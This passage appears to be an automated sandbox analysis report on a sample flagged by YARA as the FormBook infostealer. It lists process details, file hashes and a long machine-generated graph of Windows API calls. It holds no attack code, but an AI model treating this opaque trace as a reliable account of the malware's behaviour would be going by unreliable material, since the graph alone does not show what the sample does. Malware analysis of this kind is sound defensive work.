                                                                            Start time:01:49:20
                                                                            Start date:22/11/2024
                                                                            Path:C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe"
                                                                            Imagebase:0x980000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:8
                                                                            Start time:01:49:32
                                                                            Start date:22/11/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6bf500000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:3.9%
                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                              Signature Coverage:6.9%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:161
                                                                              execution_graph 93016 8e5dfd 93017 8e5e09 __freefls@4 93016->93017 93053 8e7eeb GetStartupInfoW 93017->93053 93019 8e5e0e 93055 8e9ca7 GetProcessHeap 93019->93055 93021 8e5e66 93022 8e5e71 93021->93022 93140 8e5f4d 47 API calls 3 library calls 93021->93140 93056 8e7b47 93022->93056 93025 8e5e77 93026 8e5e82 __RTC_Initialize 93025->93026 93141 8e5f4d 47 API calls 3 library calls 93025->93141 93077 8eacb3 93026->93077 93029 8e5e91 93030 8e5e9d GetCommandLineW 93029->93030 93142 8e5f4d 47 API calls 3 library calls 93029->93142 93096 8f2e7d GetEnvironmentStringsW 93030->93096 93034 8e5e9c 93034->93030 93037 8e5ec2 93109 8f2cb4 93037->93109 93040 8e5ec8 93041 8e5ed3 93040->93041 93144 8e115b 47 API calls 3 library calls 93040->93144 93123 8e1195 93041->93123 93044 8e5edb 93045 8e5ee6 __wwincmdln 93044->93045 93145 8e115b 47 API calls 3 library calls 93044->93145 93127 8c3a0f 93045->93127 93048 8e5efa 93049 8e5f09 93048->93049 93146 8e13f1 47 API calls _doexit 93048->93146 93147 8e1186 47 API calls _doexit 93049->93147 93052 8e5f0e __freefls@4 93054 8e7f01 93053->93054 93054->93019 93055->93021 93148 8e123a 30 API calls 2 library calls 93056->93148 93058 8e7b4c 93149 8e7e23 InitializeCriticalSectionAndSpinCount 93058->93149 93060 8e7b51 93061 8e7b55 93060->93061 93151 8e7e6d TlsAlloc 93060->93151 93150 8e7bbd 50 API calls 2 library calls 93061->93150 93064 8e7b67 93064->93061 93066 8e7b72 93064->93066 93065 8e7b5a 93065->93025 93152 8e6986 93066->93152 93069 8e7bb4 93160 8e7bbd 50 API calls 2 library calls 93069->93160 93072 8e7b93 93072->93069 93074 8e7b99 93072->93074 93073 8e7bb9 93073->93025 93159 8e7a94 47 API calls 4 library calls 93074->93159 93076 8e7ba1 GetCurrentThreadId 93076->93025 93078 8eacbf __freefls@4 93077->93078 93169 8e7cf4 93078->93169 93080 8eacc6 93081 8e6986 __calloc_crt 47 API calls 93080->93081 93083 8eacd7 93081->93083 93082 8ead42 GetStartupInfoW 93091 8eae80 
93082->93091 93093 8ead57 93082->93093 93083->93082 93084 8eace2 @_EH4_CallFilterFunc@8 __freefls@4 93083->93084 93084->93029 93085 8eaf44 93176 8eaf58 LeaveCriticalSection _doexit 93085->93176 93087 8eaec9 GetStdHandle 93087->93091 93088 8e6986 __calloc_crt 47 API calls 93088->93093 93089 8eaedb GetFileType 93089->93091 93090 8eada5 93090->93091 93094 8eadd7 GetFileType 93090->93094 93095 8eade5 InitializeCriticalSectionAndSpinCount 93090->93095 93091->93085 93091->93087 93091->93089 93092 8eaf08 InitializeCriticalSectionAndSpinCount 93091->93092 93092->93091 93093->93088 93093->93090 93093->93091 93094->93090 93094->93095 93095->93090 93097 8f2e8e 93096->93097 93098 8e5ead 93096->93098 93215 8e69d0 47 API calls _W_store_winword 93097->93215 93103 8f2a7b GetModuleFileNameW 93098->93103 93101 8f2eca FreeEnvironmentStringsW 93101->93098 93102 8f2eb4 ___crtGetEnvironmentStringsW 93102->93101 93104 8f2aaf _wparse_cmdline 93103->93104 93105 8e5eb7 93104->93105 93106 8f2ae9 93104->93106 93105->93037 93143 8e115b 47 API calls 3 library calls 93105->93143 93216 8e69d0 47 API calls _W_store_winword 93106->93216 93108 8f2aef _wparse_cmdline 93108->93105 93110 8f2ccd __wsetenvp 93109->93110 93114 8f2cc5 93109->93114 93111 8e6986 __calloc_crt 47 API calls 93110->93111 93112 8f2cf6 __wsetenvp 93111->93112 93112->93114 93115 8f2d4d 93112->93115 93116 8e6986 __calloc_crt 47 API calls 93112->93116 93117 8f2d72 93112->93117 93120 8f2d89 93112->93120 93217 8f2567 47 API calls _xtow_s@20 93112->93217 93113 8e1c9d _free 47 API calls 93113->93114 93114->93040 93115->93113 93116->93112 93119 8e1c9d _free 47 API calls 93117->93119 93119->93114 93218 8e6e20 IsProcessorFeaturePresent 93120->93218 93122 8f2d95 93122->93040 93124 8e11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 93123->93124 93126 8e11e0 __IsNonwritableInCurrentImage 93124->93126 93241 8e0f0a 52 API calls __cinit 93124->93241 93126->93044 93128 8c3a29 93127->93128 93129 931ebf 93127->93129 93130 
8c3a63 IsThemeActive 93128->93130 93242 8e1405 93130->93242 93134 8c3a8f 93254 8c3adb SystemParametersInfoW SystemParametersInfoW 93134->93254 93136 8c3a9b 93255 8c3d19 93136->93255 93138 8c3aa3 SystemParametersInfoW 93139 8c3ac8 93138->93139 93139->93048 93140->93022 93141->93026 93142->93034 93146->93049 93147->93052 93148->93058 93149->93060 93150->93065 93151->93064 93155 8e698d 93152->93155 93154 8e69ca 93154->93069 93158 8e7ec9 TlsSetValue 93154->93158 93155->93154 93156 8e69ab Sleep 93155->93156 93161 8f30aa 93155->93161 93157 8e69c2 93156->93157 93157->93154 93157->93155 93158->93072 93159->93076 93160->93073 93162 8f30b5 93161->93162 93167 8f30d0 __calloc_impl 93161->93167 93163 8f30c1 93162->93163 93162->93167 93168 8e7c0e 47 API calls __getptd_noexit 93163->93168 93165 8f30e0 RtlAllocateHeap 93166 8f30c6 93165->93166 93165->93167 93166->93155 93167->93165 93167->93166 93168->93166 93170 8e7d18 EnterCriticalSection 93169->93170 93171 8e7d05 93169->93171 93170->93080 93177 8e7d7c 93171->93177 93173 8e7d0b 93173->93170 93201 8e115b 47 API calls 3 library calls 93173->93201 93176->93084 93178 8e7d88 __freefls@4 93177->93178 93179 8e7da9 93178->93179 93180 8e7d91 93178->93180 93186 8e7e11 __freefls@4 93179->93186 93195 8e7da7 93179->93195 93202 8e81c2 47 API calls 2 library calls 93180->93202 93182 8e7d96 93203 8e821f 47 API calls 7 library calls 93182->93203 93184 8e7dbd 93187 8e7dc4 93184->93187 93188 8e7dd3 93184->93188 93186->93173 93206 8e7c0e 47 API calls __getptd_noexit 93187->93206 93191 8e7cf4 __lock 46 API calls 93188->93191 93189 8e7d9d 93204 8e1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93189->93204 93194 8e7dda 93191->93194 93193 8e7dc9 93193->93186 93196 8e7dfe 93194->93196 93197 8e7de9 InitializeCriticalSectionAndSpinCount 93194->93197 93195->93179 93205 8e69d0 47 API calls _W_store_winword 93195->93205 93207 8e1c9d 93196->93207 93198 8e7e04 93197->93198 93213 8e7e1a LeaveCriticalSection _doexit 93198->93213 
93202->93182 93203->93189 93205->93184 93206->93193 93208 8e1ca6 RtlFreeHeap 93207->93208 93209 8e1ccf _free 93207->93209 93208->93209 93210 8e1cbb 93208->93210 93209->93198 93214 8e7c0e 47 API calls __getptd_noexit 93210->93214 93212 8e1cc1 GetLastError 93212->93209 93213->93186 93214->93212 93215->93102 93216->93108 93217->93112 93219 8e6e2b 93218->93219 93224 8e6cb5 93219->93224 93223 8e6e46 93223->93122 93225 8e6ccf _memset __call_reportfault 93224->93225 93226 8e6cef IsDebuggerPresent 93225->93226 93232 8e81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 93226->93232 93228 8e6db3 __call_reportfault 93233 8ea70c 93228->93233 93230 8e6dd6 93231 8e8197 GetCurrentProcess TerminateProcess 93230->93231 93231->93223 93232->93228 93234 8ea716 IsProcessorFeaturePresent 93233->93234 93235 8ea714 93233->93235 93237 8f37b0 93234->93237 93235->93230 93240 8f375f 5 API calls 2 library calls 93237->93240 93239 8f3893 93239->93230 93240->93239 93241->93126 93243 8e7cf4 __lock 47 API calls 93242->93243 93244 8e1410 93243->93244 93307 8e7e58 LeaveCriticalSection 93244->93307 93246 8c3a88 93247 8e146d 93246->93247 93248 8e1477 93247->93248 93249 8e1491 93247->93249 93248->93249 93308 8e7c0e 47 API calls __getptd_noexit 93248->93308 93249->93134 93251 8e1481 93309 8e6e10 8 API calls _xtow_s@20 93251->93309 93253 8e148c 93253->93134 93254->93136 93256 8c3d26 __ftell_nolock 93255->93256 93310 8cd7f7 93256->93310 93260 8c3d57 IsDebuggerPresent 93261 931cc1 MessageBoxA 93260->93261 93262 8c3d65 93260->93262 93263 931cd9 93261->93263 93262->93263 93264 8c3d82 93262->93264 93293 8c3e3a 93262->93293 93512 8dc682 48 API calls 93263->93512 93389 8c40e5 93264->93389 93265 8c3e41 SetCurrentDirectoryW 93270 8c3e4e Mailbox 93265->93270 93269 8c3da0 GetFullPathNameW 93405 8c6a63 93269->93405 93270->93138 93271 931ce9 93274 931cff SetCurrentDirectoryW 93271->93274 93273 8c3ddb 93416 8c6430 93273->93416 93274->93270 93277 8c3df6 93278 8c3e00 93277->93278 93513 9071fa 
AllocateAndInitializeSid CheckTokenMembership FreeSid 93277->93513 93432 8c3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 93278->93432 93281 931d1c 93281->93278 93284 931d2d 93281->93284 93514 8c5374 93284->93514 93285 8c3e0a 93287 8c3e1f 93285->93287 93440 8c4ffc 93285->93440 93450 8ce8d0 93287->93450 93289 931d35 93521 8cce19 93289->93521 93293->93265 93294 931d42 93296 931d49 93294->93296 93297 931d6e 93294->93297 93527 8c518c 93296->93527 93299 8c518c 48 API calls 93297->93299 93301 931d6a GetForegroundWindow ShellExecuteW 93299->93301 93305 931d9e Mailbox 93301->93305 93305->93293 93306 8c518c 48 API calls 93306->93301 93307->93246 93308->93251 93309->93253 93546 8df4ea 93310->93546 93312 8cd818 93313 8df4ea 48 API calls 93312->93313 93314 8c3d31 GetCurrentDirectoryW 93313->93314 93315 8c61ca 93314->93315 93577 8de99b 93315->93577 93319 8c61eb 93320 8c5374 50 API calls 93319->93320 93321 8c61ff 93320->93321 93322 8cce19 48 API calls 93321->93322 93323 8c620c 93322->93323 93594 8c39db 93323->93594 93325 8c6216 Mailbox 93606 8c6eed 93325->93606 93330 8cce19 48 API calls 93331 8c6244 93330->93331 93613 8cd6e9 93331->93613 93333 8c6254 Mailbox 93334 8cce19 48 API calls 93333->93334 93335 8c627c 93334->93335 93336 8cd6e9 55 API calls 93335->93336 93337 8c628f Mailbox 93336->93337 93338 8cce19 48 API calls 93337->93338 93339 8c62a0 93338->93339 93617 8cd645 93339->93617 93341 8c62b2 Mailbox 93342 8cd7f7 48 API calls 93341->93342 93343 8c62c5 93342->93343 93627 8c63fc 93343->93627 93347 8c62df 93348 8c62e9 93347->93348 93349 931c08 93347->93349 93350 8e0fa7 _W_store_winword 59 API calls 93348->93350 93351 8c63fc 48 API calls 93349->93351 93352 8c62f4 93350->93352 93353 931c1c 93351->93353 93352->93353 93354 8c62fe 93352->93354 93356 8c63fc 48 API calls 93353->93356 93355 8e0fa7 _W_store_winword 59 API calls 93354->93355 93358 8c6309 93355->93358 93357 931c38 93356->93357 93360 8c5374 50 API calls 93357->93360 93358->93357 93359 8c6313 93358->93359 
93361 8e0fa7 _W_store_winword 59 API calls 93359->93361 93362 931c5d 93360->93362 93363 8c631e 93361->93363 93364 8c63fc 48 API calls 93362->93364 93365 8c635f 93363->93365 93367 931c86 93363->93367 93370 8c63fc 48 API calls 93363->93370 93368 931c69 93364->93368 93366 8c636c 93365->93366 93365->93367 93643 8dc050 93366->93643 93371 8c6eed 48 API calls 93367->93371 93369 8c6eed 48 API calls 93368->93369 93374 931c77 93369->93374 93375 8c6342 93370->93375 93372 931ca8 93371->93372 93376 8c63fc 48 API calls 93372->93376 93378 8c63fc 48 API calls 93374->93378 93379 8c6eed 48 API calls 93375->93379 93381 931cb5 93376->93381 93377 8c6384 93654 8d1b90 93377->93654 93378->93367 93380 8c6350 93379->93380 93383 8c63fc 48 API calls 93380->93383 93381->93381 93383->93365 93384 8d1b90 48 API calls 93386 8c6394 93384->93386 93386->93384 93387 8c63fc 48 API calls 93386->93387 93388 8c63d6 Mailbox 93386->93388 93670 8c6b68 48 API calls 93386->93670 93387->93386 93388->93260 93390 8c40f2 __ftell_nolock 93389->93390 93391 8c410b 93390->93391 93392 93370e _memset 93390->93392 94179 8c660f 93391->94179 93395 93372a GetOpenFileNameW 93392->93395 93397 933779 93395->93397 93398 8c6a63 48 API calls 93397->93398 93400 93378e 93398->93400 93400->93400 93402 8c4129 94204 8c4139 93402->94204 93406 8c6adf 93405->93406 93408 8c6a6f __wsetenvp 93405->93408 93407 8cb18b 48 API calls 93406->93407 93415 8c6ab6 ___crtGetEnvironmentStringsW 93407->93415 93409 8c6a8b 93408->93409 93410 8c6ad7 93408->93410 94423 8c6b4a 93409->94423 94426 8cc369 48 API calls 93410->94426 93413 8c6a95 93414 8dee75 48 API calls 93413->93414 93414->93415 93415->93273 93417 8c643d __ftell_nolock 93416->93417 94427 8c4c75 93417->94427 93419 8c6442 93431 8c3dee 93419->93431 94438 8c5928 86 API calls 93419->94438 93421 8c644f 93421->93431 94439 8c5798 88 API calls Mailbox 93421->94439 93423 8c6458 93424 8c645c GetFullPathNameW 93423->93424 93423->93431 93425 8c6a63 48 API calls 93424->93425 93426 8c6488 93425->93426 93427 
8c6a63 48 API calls 93426->93427 93428 8c6495 93427->93428 93429 935dcf _wcscat 93428->93429 93430 8c6a63 48 API calls 93428->93430 93430->93431 93431->93271 93431->93277 93433 8c3ed8 93432->93433 93434 931cba 93432->93434 94486 8c4024 93433->94486 93438 8c3e05 93439 8c36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93438->93439 93439->93285 93441 8c5027 _memset 93440->93441 94491 8c4c30 93441->94491 93444 8c50ac 93446 8c50ca Shell_NotifyIconW 93444->93446 93447 933d28 Shell_NotifyIconW 93444->93447 94495 8c51af 93446->94495 93449 8c50df 93449->93287 93451 8ce8f6 93450->93451 93510 8ce906 Mailbox 93450->93510 93452 8ced52 93451->93452 93451->93510 94636 8de3cd 335 API calls 93452->94636 93454 8cebc7 93455 8c3e2a 93454->93455 94637 8c2ff6 16 API calls 93454->94637 93455->93293 93511 8c3847 Shell_NotifyIconW _memset 93455->93511 93457 8ced63 93457->93455 93458 8ced70 93457->93458 94638 8de312 335 API calls Mailbox 93458->94638 93459 8ce94c PeekMessageW 93459->93510 93461 93526e Sleep 93461->93510 93462 8ced77 LockWindowUpdate DestroyWindow GetMessageW 93462->93455 93464 8ceda9 93462->93464 93465 9359ef TranslateMessage DispatchMessageW GetMessageW 93464->93465 93465->93465 93467 935a1f 93465->93467 93467->93455 93468 8ced21 PeekMessageW 93468->93510 93469 8c1caa 49 API calls 93469->93510 93470 8cebf7 timeGetTime 93470->93510 93472 8df4ea 48 API calls 93472->93510 93473 8c6eed 48 API calls 93473->93510 93474 8ced3a TranslateMessage DispatchMessageW 93474->93468 93475 935557 WaitForSingleObject 93477 935574 GetExitCodeProcess CloseHandle 93475->93477 93475->93510 93476 93588f Sleep 93504 935429 Mailbox 93476->93504 93477->93510 93478 8cd7f7 48 API calls 93478->93504 93479 8cedae timeGetTime 94639 8c1caa 49 API calls 93479->94639 93480 935733 Sleep 93480->93504 93484 935926 GetExitCodeProcess 93489 935952 CloseHandle 93484->93489 93490 93593c WaitForSingleObject 93484->93490 93486 8c2aae 311 API calls 93486->93510 93487 8ddc38 timeGetTime 93487->93504 93488 
935445 Sleep 93488->93510 93489->93504 93490->93489 93490->93510 93491 935432 Sleep 93491->93488 93492 928c4b 108 API calls 93492->93504 93493 8c2c79 107 API calls 93493->93504 93495 9359ae Sleep 93495->93510 93498 8cce19 48 API calls 93498->93504 93501 8cd6e9 55 API calls 93501->93504 93504->93478 93504->93484 93504->93487 93504->93488 93504->93491 93504->93492 93504->93493 93504->93495 93504->93498 93504->93501 93504->93510 94641 904cbe 49 API calls Mailbox 93504->94641 94642 8c1caa 49 API calls 93504->94642 94643 8c2aae 335 API calls 93504->94643 94673 91ccb2 50 API calls 93504->94673 94674 907a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93504->94674 94675 906532 63 API calls 3 library calls 93504->94675 93506 8cce19 48 API calls 93506->93510 93507 90cc5c 86 API calls 93507->93510 93509 8cd6e9 55 API calls 93509->93510 93510->93454 93510->93459 93510->93461 93510->93468 93510->93469 93510->93470 93510->93472 93510->93473 93510->93474 93510->93475 93510->93476 93510->93479 93510->93480 93510->93486 93510->93488 93510->93504 93510->93506 93510->93507 93510->93509 94518 8cef00 93510->94518 94525 8cf110 93510->94525 94590 8d45e0 93510->94590 94607 8ceed0 335 API calls Mailbox 93510->94607 94608 8d3200 93510->94608 94634 8de244 TranslateAcceleratorW 93510->94634 94635 8ddc5f IsDialogMessageW GetClassLongW 93510->94635 94640 928d23 48 API calls 93510->94640 94644 8cfe30 93510->94644 93511->93293 93512->93271 93513->93281 93515 8ef8a0 __ftell_nolock 93514->93515 93516 8c5381 GetModuleFileNameW 93515->93516 93517 8cce19 48 API calls 93516->93517 93518 8c53a7 93517->93518 93519 8c660f 49 API calls 93518->93519 93520 8c53b1 Mailbox 93519->93520 93520->93289 93522 8cce28 __wsetenvp 93521->93522 93523 8dee75 48 API calls 93522->93523 93524 8cce50 ___crtGetEnvironmentStringsW 93523->93524 93525 8df4ea 48 API calls 93524->93525 93526 8cce66 93525->93526 93526->93294 93528 8c5197 93527->93528 93529 8c519f 93528->93529 93530 931ace 
94933->94934 94935 93436a 94933->94935 94936 8df4ea 48 API calls 94934->94936 94937 8c2b92 94936->94937 94938 8c2bb3 94937->94938 94950 8c2bce 48 API calls 94937->94950 94938->94622 94940->94622 94941->94622 94942->94622 94943->94622 94944->94622 94945->94622 94946->94622 94947->94622 94948->94622 94949->94622 94950->94938 94951->94669 94952->94669 94953->94670 94954->94670 94955->94661 94956->94656 94957->94671 94959 8c513f __wsetenvp 94958->94959 94960 931b27 94959->94960 94961 8c5151 94959->94961 94963 8c6b4a 48 API calls 94960->94963 94962 8cbb85 48 API calls 94961->94962 94964 8c515e ___crtGetEnvironmentStringsW 94962->94964 94965 931b34 94963->94965 94964->93533 94966 8dee75 48 API calls 94965->94966 94967 931b57 ___crtGetEnvironmentStringsW 94966->94967 94969 8cb392 94968->94969 94976 8cb3c5 ___crtGetEnvironmentStringsW 94968->94976 94970 8cb3fd 94969->94970 94971 8cb3b8 94969->94971 94969->94976 94972 8df4ea 48 API calls 94970->94972 94973 8cbb85 48 API calls 94971->94973 94974 8cb407 94972->94974 94973->94976 94975 8df4ea 48 API calls 94974->94975 94975->94976 94976->93542 94977->93543 94978 939c06 94989 8dd3be 94978->94989 94980 939c1c 94988 939c91 Mailbox 94980->94988 94998 8c1caa 49 API calls 94980->94998 94982 8d3200 335 API calls 94984 939cc5 94982->94984 94986 93a7ab Mailbox 94984->94986 95000 90cc5c 86 API calls 4 library calls 94984->95000 94985 939c71 94985->94984 94999 90b171 48 API calls 94985->94999 94988->94982 94990 8dd3dc 94989->94990 94991 8dd3ca 94989->94991 94993 8dd40b 94990->94993 94994 8dd3e2 94990->94994 95001 8cdcae 50 API calls Mailbox 94991->95001 95002 8cdcae 50 API calls Mailbox 94993->95002 94996 8df4ea 48 API calls 94994->94996 94997 8dd3d4 94996->94997 94997->94980 94998->94985 94999->94988 95000->94986 95001->94997 95002->94997 95003 9319cb 95008 8c2322 95003->95008 95005 9319d1 95041 8e0f0a 52 API calls __cinit 95005->95041 95007 9319db 95009 8c2344 95008->95009 95042 8c26df 95009->95042 95014 8cd7f7 48 API calls 95015 
8c2384 95014->95015 95016 8cd7f7 48 API calls 95015->95016 95017 8c238e 95016->95017 95018 8cd7f7 48 API calls 95017->95018 95019 8c2398 95018->95019 95020 8cd7f7 48 API calls 95019->95020 95021 8c23de 95020->95021 95022 8cd7f7 48 API calls 95021->95022 95023 8c24c1 95022->95023 95050 8c263f 95023->95050 95027 8c24f1 95028 8cd7f7 48 API calls 95027->95028 95029 8c24fb 95028->95029 95079 8c2745 95029->95079 95031 8c2546 95032 8c2556 GetStdHandle 95031->95032 95033 8c25b1 95032->95033 95034 93501d 95032->95034 95035 8c25b7 CoInitialize 95033->95035 95034->95033 95036 935026 95034->95036 95035->95005 95086 9092d4 53 API calls 95036->95086 95038 93502d 95087 9099f9 CreateThread 95038->95087 95040 935039 CloseHandle 95040->95035 95041->95007 95088 8c2854 95042->95088 95045 8c6a63 48 API calls 95046 8c234a 95045->95046 95047 8c272e 95046->95047 95102 8c27ec 6 API calls 95047->95102 95049 8c237a 95049->95014 95051 8cd7f7 48 API calls 95050->95051 95052 8c264f 95051->95052 95053 8cd7f7 48 API calls 95052->95053 95054 8c2657 95053->95054 95103 8c26a7 95054->95103 95057 8c26a7 48 API calls 95058 8c2667 95057->95058 95059 8cd7f7 48 API calls 95058->95059 95060 8c2672 95059->95060 95061 8df4ea 48 API calls 95060->95061 95062 8c24cb 95061->95062 95063 8c22a4 95062->95063 95064 8c22b2 95063->95064 95065 8cd7f7 48 API calls 95064->95065 95066 8c22bd 95065->95066 95067 8cd7f7 48 API calls 95066->95067 95068 8c22c8 95067->95068 95069 8cd7f7 48 API calls 95068->95069 95070 8c22d3 95069->95070 95071 8cd7f7 48 API calls 95070->95071 95072 8c22de 95071->95072 95073 8c26a7 48 API calls 95072->95073 95074 8c22e9 95073->95074 95075 8df4ea 48 API calls 95074->95075 95076 8c22f0 95075->95076 95077 931fe7 95076->95077 95078 8c22f9 RegisterWindowMessageW 95076->95078 95078->95027 95080 8c2755 95079->95080 95081 935f4d 95079->95081 95083 8df4ea 48 API calls 95080->95083 95108 90c942 50 API calls 95081->95108 95085 8c275d 95083->95085 95084 935f58 95085->95031 95086->95038 95087->95040 95109 
9099df 54 API calls 95087->95109 95095 8c2870 95088->95095 95091 8c2870 48 API calls 95092 8c2864 95091->95092 95093 8cd7f7 48 API calls 95092->95093 95094 8c2716 95093->95094 95094->95045 95096 8cd7f7 48 API calls 95095->95096 95097 8c287b 95096->95097 95098 8cd7f7 48 API calls 95097->95098 95099 8c2883 95098->95099 95100 8cd7f7 48 API calls 95099->95100 95101 8c285c 95100->95101 95101->95091 95102->95049 95104 8cd7f7 48 API calls 95103->95104 95105 8c26b0 95104->95105 95106 8cd7f7 48 API calls 95105->95106 95107 8c265f 95106->95107 95107->95057 95108->95084 95110 93197b 95115 8ddd94 95110->95115 95114 93198a 95116 8df4ea 48 API calls 95115->95116 95117 8ddd9c 95116->95117 95118 8dddb0 95117->95118 95123 8ddf3d 95117->95123 95122 8e0f0a 52 API calls __cinit 95118->95122 95122->95114 95124 8ddda8 95123->95124 95125 8ddf46 95123->95125 95127 8dddc0 95124->95127 95155 8e0f0a 52 API calls __cinit 95125->95155 95128 8cd7f7 48 API calls 95127->95128 95129 8dddd7 GetVersionExW 95128->95129 95130 8c6a63 48 API calls 95129->95130 95131 8dde1a 95130->95131 95156 8ddfb4 95131->95156 95134 8c6571 48 API calls 95135 8dde2e 95134->95135 95136 9324c8 95135->95136 95160 8ddf77 95135->95160 95139 8ddea4 GetCurrentProcess 95169 8ddf5f LoadLibraryA GetProcAddress 95139->95169 95140 8ddebb 95142 8ddf31 GetSystemInfo 95140->95142 95143 8ddee3 95140->95143 95145 8ddf0e 95142->95145 95163 8de00c 95143->95163 95147 8ddf1c FreeLibrary 95145->95147 95148 8ddf21 95145->95148 95147->95148 95148->95118 95149 8ddf29 GetSystemInfo 95152 8ddf03 95149->95152 95150 8ddef9 95166 8ddff4 95150->95166 95152->95145 95154 8ddf09 FreeLibrary 95152->95154 95154->95145 95155->95124 95157 8ddfbd 95156->95157 95158 8cb18b 48 API calls 95157->95158 95159 8dde22 95158->95159 95159->95134 95170 8ddf89 95160->95170 95174 8de01e 95163->95174 95167 8de00c 2 API calls 95166->95167 95168 8ddf01 GetNativeSystemInfo 95167->95168 95168->95152 95169->95140 95171 8ddea0 95170->95171 95172 8ddf92 LoadLibraryA 95170->95172 
95171->95139 95171->95140 95172->95171 95173 8ddfa3 GetProcAddress 95172->95173 95173->95171 95175 8ddef1 95174->95175 95176 8de027 LoadLibraryA 95174->95176 95175->95149 95175->95150 95176->95175 95177 8de038 GetProcAddress 95176->95177 95177->95175 95178 9319ba 95183 8dc75a 95178->95183 95182 9319c9 95184 8cd7f7 48 API calls 95183->95184 95185 8dc7c8 95184->95185 95191 8dd26c 95185->95191 95187 8dc865 95188 8dc881 95187->95188 95194 8dd1fa 48 API calls ___crtGetEnvironmentStringsW 95187->95194 95190 8e0f0a 52 API calls __cinit 95188->95190 95190->95182 95195 8dd298 95191->95195 95194->95187 95196 8dd28b 95195->95196 95197 8dd2a5 95195->95197 95196->95187 95197->95196 95198 8dd2ac RegOpenKeyExW 95197->95198 95198->95196 95199 8dd2c6 RegQueryValueExW 95198->95199 95200 8dd2fc RegCloseKey 95199->95200 95201 8dd2e7 95199->95201 95200->95196 95201->95200 95202 938eb8 95206 90a635 95202->95206 95204 938ec3 95205 90a635 84 API calls 95204->95205 95205->95204 95212 90a66f 95206->95212 95213 90a642 95206->95213 95207 90a671 95218 8dec4e 81 API calls 95207->95218 95209 90a676 95210 8c936c 81 API calls 95209->95210 95211 90a67d 95210->95211 95214 8c510d 48 API calls 95211->95214 95212->95204 95213->95207 95213->95209 95213->95212 95215 90a669 95213->95215 95214->95212 95217 8d4525 61 API calls ___crtGetEnvironmentStringsW 95215->95217 95217->95212 95218->95209 95219 11b5030 95233 11b2c80 95219->95233 95221 11b50b2 95236 11b4f20 95221->95236 95239 11b60e0 GetPEB 95233->95239 95235 11b330b 95235->95221 95237 11b4f29 Sleep 95236->95237 95238 11b4f37 95237->95238 95240 11b610a 95239->95240 95240->95235 95241 8cef80 95244 8d3b70 95241->95244 95243 8cef8c 95245 8d3bc8 95244->95245 95268 8d42a5 95244->95268 95246 8d3bef 95245->95246 95248 936fd1 95245->95248 95251 936f7e 95245->95251 95257 936f9b 95245->95257 95247 8df4ea 48 API calls 95246->95247 95249 8d3c18 95247->95249 95324 91ceca 335 API calls Mailbox 95248->95324 95252 8df4ea 48 API calls 95249->95252 95251->95246 95253 
936f87 95251->95253 95300 8d3c2c __wsetenvp ___crtGetEnvironmentStringsW 95252->95300 95321 91d552 335 API calls Mailbox 95253->95321 95254 936fbe 95323 90cc5c 86 API calls 4 library calls 95254->95323 95257->95254 95322 91da0e 335 API calls 2 library calls 95257->95322 95258 8d42f2 95343 90cc5c 86 API calls 4 library calls 95258->95343 95261 9373b0 95261->95243 95262 937297 95332 90cc5c 86 API calls 4 library calls 95262->95332 95263 93737a 95342 90cc5c 86 API calls 4 library calls 95263->95342 95265 8ddce0 53 API calls 95265->95300 95336 90cc5c 86 API calls 4 library calls 95268->95336 95270 93707e 95325 90cc5c 86 API calls 4 library calls 95270->95325 95272 8d40df 95333 90cc5c 86 API calls 4 library calls 95272->95333 95273 8cd6e9 55 API calls 95273->95300 95276 8cd645 53 API calls 95276->95300 95279 9372d2 95334 90cc5c 86 API calls 4 library calls 95279->95334 95281 8cfe30 335 API calls 95281->95300 95283 937350 95340 90cc5c 86 API calls 4 library calls 95283->95340 95284 9372e9 95335 90cc5c 86 API calls 4 library calls 95284->95335 95285 937363 95341 90cc5c 86 API calls 4 library calls 95285->95341 95289 8c6a63 48 API calls 95289->95300 95291 8dc050 48 API calls 95291->95300 95292 93714c 95329 91ccdc 48 API calls 95292->95329 95293 8df4ea 48 API calls 95293->95300 95295 93733f 95339 90cc5c 86 API calls 4 library calls 95295->95339 95296 8c6eed 48 API calls 95296->95300 95298 8cd286 48 API calls 95298->95300 95300->95258 95300->95262 95300->95263 95300->95265 95300->95268 95300->95270 95300->95272 95300->95273 95300->95276 95300->95279 95300->95281 95300->95283 95300->95284 95300->95285 95300->95289 95300->95291 95300->95292 95300->95293 95300->95295 95300->95296 95300->95298 95301 8d3f2b 95300->95301 95302 9371e1 95300->95302 95304 8dee75 48 API calls 95300->95304 95316 8cd9a0 53 API calls __cinit 95300->95316 95317 8cd83d 53 API calls 95300->95317 95318 8ccdb9 48 API calls 95300->95318 95319 8dc15c 